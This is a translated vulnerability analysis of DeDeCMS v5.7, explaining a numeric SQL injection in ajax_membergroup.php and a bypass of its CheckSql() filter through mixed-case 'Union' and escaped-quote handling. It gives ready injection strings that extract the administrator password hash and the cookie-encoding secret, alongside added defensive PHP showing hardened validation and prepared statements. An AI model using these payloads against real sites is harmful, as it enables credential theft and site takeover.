DeDeCMS v5.7 latest vulnerability analysis

Source: Internet
Author: User

DeDeCMS is a well-known professional PHP website content management system in China. It has been available for seven years and has gone through many upgrades and revisions; the latest version is the official V5.7, updated on April 9 and August 12. Its functionality keeps improving, so I originally assumed it would be a CMS with a high level of security. After this analysis, however, the picture is puzzling: after seven years of development, the security of this professional domestic system is still worrying. Perhaps no network is absolutely secure.
Injection Vulnerability
Vulnerability 1: the membergroup variable in the /member/ajax_membergroup.php page is not filtered, which leads to a numeric injection. The key code is as follows:
 
// edit group
elseif ($action == 'post')
{
    if (empty($membergroup)) {
        echo "You have not set a group!";
        exit;
    }
    // the table names are missing from the page as extracted; $membergroup is quoted here
    $sql = "UPDATE  SET `groupid`='{$membergroup}' WHERE `fid`='{$mid}' AND `mid`='{$cfg_ml->M_ID}'; ";
    $dsql->ExecuteNoneQuery($sql);
    // ... but not here: the unquoted id is a numeric injection point
    $row = $dsql->GetOne("SELECT groupname FROM  WHERE mid={$cfg_ml->M_ID} AND id={$membergroup}"); // numeric injection
    echo "&nbsp;" . $row['groupname'] . "&nbsp;<a href='#' onclick='editmembergroup($mid); return false;'>modify</a>";
 
Obviously, $membergroup causes a numeric injection vulnerability when action=post. However, before a statement reaches the MySQL database, DeDeCMS runs it through the custom CheckSql() function, which performs a security check on the SQL text, so it cannot be injected directly.
Bypassing the anti-injection check. The CheckSql() function is defined in the database class file /include/dedesql.class.php (or /include/dedesqli.class.php). The code is as follows:
 
if (!function_exists('CheckSql'))
{
    function CheckSql($db_string, $querytype = 'select')
    {
        global $cfg_cookie_encode;
        $clean = ''; $error = ''; $old_pos = 0; $pos = -1;
        ... (omitted)
        // for ordinary query statements, filter some special syntax directly
        if ($querytype == 'select')
        {
            $notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";
            // [^0-9a-z@\._-]{1,} means at least one character that is not a digit, lowercase letter, @, ., _ or -
            if (preg_match("/" . $notallow1 . "/", $db_string))
            {
                // ① preg_match is called without the i modifier, so an uppercase keyword such as "Union" bypasses it
                fputs(fopen($log_file, 'a+'), "$userIP|$getUrl|$db_string|SelectBreak\r\n");
                exit("<font size='5' color='red'>Safe Alert: Request Error step 1!</font>");
            }
        }
        while (TRUE)
        {
            $pos = strpos($db_string, '\'', $pos + 1);
            if ($pos === FALSE)
            {
                break;
            }
            // ② if $db_string contains no \' the while loop exits here and execution continues below
            $clean .= substr($db_string, $old_pos, $pos - $old_pos);
            while (TRUE)
            {
                ... (omitted)
            }
            $clean .= '$s$';
            // ③ the characters between one \' and the next \' in $db_string are replaced by "$s$", i.e. the text between escaped quotes is trusted; this is the key to bypassing the anti-injection check
            $old_pos = $pos + 1;
        }
        $clean .= substr($db_string, $old_pos);
        $clean = trim(strtolower(preg_replace(array('~\s++~s'), array(' '), $clean)));
        // ④ \s matches any whitespace character (space, tab, form feed, ...); $clean is also converted to lowercase
        // ⑤ check for the union keyword again
        if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
        {
            $fail = TRUE;
            $error = "union detect";
        }
        // ⑥ then check in turn for --, #, benchmark, load_file, outfile, select, ...
        elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE)
        {
            ... (omitted)
        }
        // these functions are not used by the program itself, but attackers use them to operate on files and dump the database
        elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)
        ... (omitted)
        // old MySQL versions do not support subqueries, which our program rarely uses, but attackers can use them to query sensitive database information
        elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
        {
            ... (omitted)
        }
        if (!empty($fail))
        {
            // a restricted SQL keyword was found: write to the log file $log_file and output "Safe Alert: Request Error step 2!"
            fputs(fopen($log_file, 'a+'), "$userIP|$getUrl|$db_string|$error\r\n");
            exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>");
        }
        else
        {
            // ⑦ no restricted SQL keyword was found: return $db_string unchanged
            return $db_string;
        }
    }
}
 
Statement ① uses a regular expression to filter SQL keywords, but because the i modifier is not supplied, an uppercase keyword such as "Union" slips past it. The while loop then rewrites the SQL string so that everything between two escaped single quotes (\') becomes "$s$" and is never checked. The intention is to trust the text between escaped quotes, i.e. to allow submitted text that happens to contain SQL keywords (the body of a new article, for example), but this trust is exactly what creates the vulnerability.
Vulnerability exploitation. The membergroup value is constructed as 'Union select pwd from 'where 1 or ' (table names are elided in the source). Note: 1) "Union" must not be written entirely in lowercase ("union"), and 2) the single quote ' is used. After the variable is submitted, the SQL statement becomes "SELECT groupname FROM  WHERE mid=8 AND id='Union select pwd from  where 1 or '", where mid is the current user's ID. First, the uppercase Union bypasses anti-injection statement ①; then the anti-injection code treats the string between \' and \' as trustworthy and applies no filtering to it, even though it contains keywords such as union and select! Add the following output statements to CheckSql() to display the SQL statement before and after conversion, together with the injection result:
... (omitted)
echo "original string: " . $db_string . "<br>";
// complete SQL check
while (TRUE)
{
    ... (omitted)
}
$clean .= substr($db_string, $old_pos);
$clean = trim(strtolower(preg_replace(array('~\s++~s'), array(' '), $clean)));
echo "after conversion: " . $clean . "<br>";
... (omitted)
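The two defects described above, the case-sensitive keyword filter in statement ① and the unquoted, unfiltered id in ajax_membergroup.php, are easiest to reason about side by side with their hardened forms. The following PHP is an added example written for this page; it is not DeDeCMS's own code. The table name `#@__member_group` and the column names are assumptions standing in for the names elided in the original snippet, and the SQL strings in the self-check are constructed inputs.

```php
<?php
// Added example, not DeDeCMS code. Table/column names are assumptions.

// 1. The keyword filter as shipped: no /i modifier, so only lowercase
//    keywords match. Returns true when the statement would be blocked.
function checkKeywordsCaseSensitive(string $sql): bool
{
    $notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";
    return preg_match("/" . $notallow1 . "/", $sql) === 1;
}

// Hardened variant: /i makes the keyword match case-insensitive.
function checkKeywordsCaseInsensitive(string $sql): bool
{
    $notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";
    return preg_match("/" . $notallow1 . "/i", $sql) === 1;
}

// 2. A better blacklist is not the real fix; the fix is to keep user input
//    out of the SQL text. Mirrors the vulnerable line: $membergroup is
//    interpolated verbatim into a numeric comparison.
function buildGroupQueryUnsafe(string $mid, string $membergroup): string
{
    return "SELECT groupname FROM `#@__member_group` WHERE mid={$mid} AND id={$membergroup}";
}

// Hardened: an id that must be numeric is validated and cast before use,
// so nothing but digits can ever reach the statement. Returns null on
// invalid input so the caller can answer with an error.
function buildGroupQueryHardened(int $mid, string $membergroup): ?string
{
    if (!ctype_digit($membergroup)) {
        return null;
    }
    $gid = (int) $membergroup;
    return "SELECT groupname FROM `#@__member_group` WHERE mid={$mid} AND id={$gid}";
}

// Hardened further: with mysqli a prepared statement binds the values as
// integers, so the query text and the data never mix.
function fetchGroupName(mysqli $db, int $mid, int $gid): ?string
{
    $stmt = $db->prepare("SELECT groupname FROM `#@__member_group` WHERE mid=? AND id=?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('ii', $mid, $gid);
    $stmt->execute();
    $stmt->bind_result($name);
    $result = $stmt->fetch() ? $name : null;
    $stmt->close();
    return $result;
}

// Self-check on constructed statements (no database needed).
$samples = [
    'lowercase keyword'  => "SELECT a FROM t WHERE id=1 union select 2",
    'mixed-case keyword' => "SELECT a FROM t WHERE id=1 Union select 2",
    'benign numeric'     => "SELECT a FROM t WHERE id=7",
];
foreach ($samples as $label => $sql) {
    printf("%-20s case-sensitive: %-7s  case-insensitive: %s\n", $label,
        checkKeywordsCaseSensitive($sql) ? 'blocked' : 'passed',
        checkKeywordsCaseInsensitive($sql) ? 'blocked' : 'passed');
}
var_dump(buildGroupQueryHardened(8, "3"));        // the query with id=3
var_dump(buildGroupQueryHardened(8, "3 or 1=1")); // NULL: rejected before any SQL is built
```

Running the self-check shows the mixed-case sample passing the case-sensitive filter and being blocked by the case-insensitive one, which is the whole of defect ①. The second half shows why the filter should be a last line of defence only: validating the id as digits, or binding it as an integer parameter, removes the injection point regardless of how the keyword list is written.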
 
Note the value of substr(md5($this->userPwd), 5, 20) here: removing the first three characters and the last character of that 20-character string leaves the 16-character MD5 form, for example "7a57a5a743894a0e". Common injection links are as follows:
 
Inject the administrator password:
    'Union select pwd from 'where 1 or'
    // if several administrators exist, change the WHERE condition to "id=1 or'" or "userid=0x61646D696E or'"
Inject $cfg_cookie_encode:
    'Union select value from 'where aid=3 or'
    // once $cfg_cookie_encode is obtained, vulnerability 2 can be exploited directly. In addition, the injection trace is recorded in the file /data/{md5($cfg_cookie_encode)}_safe.txt.

Author loveless
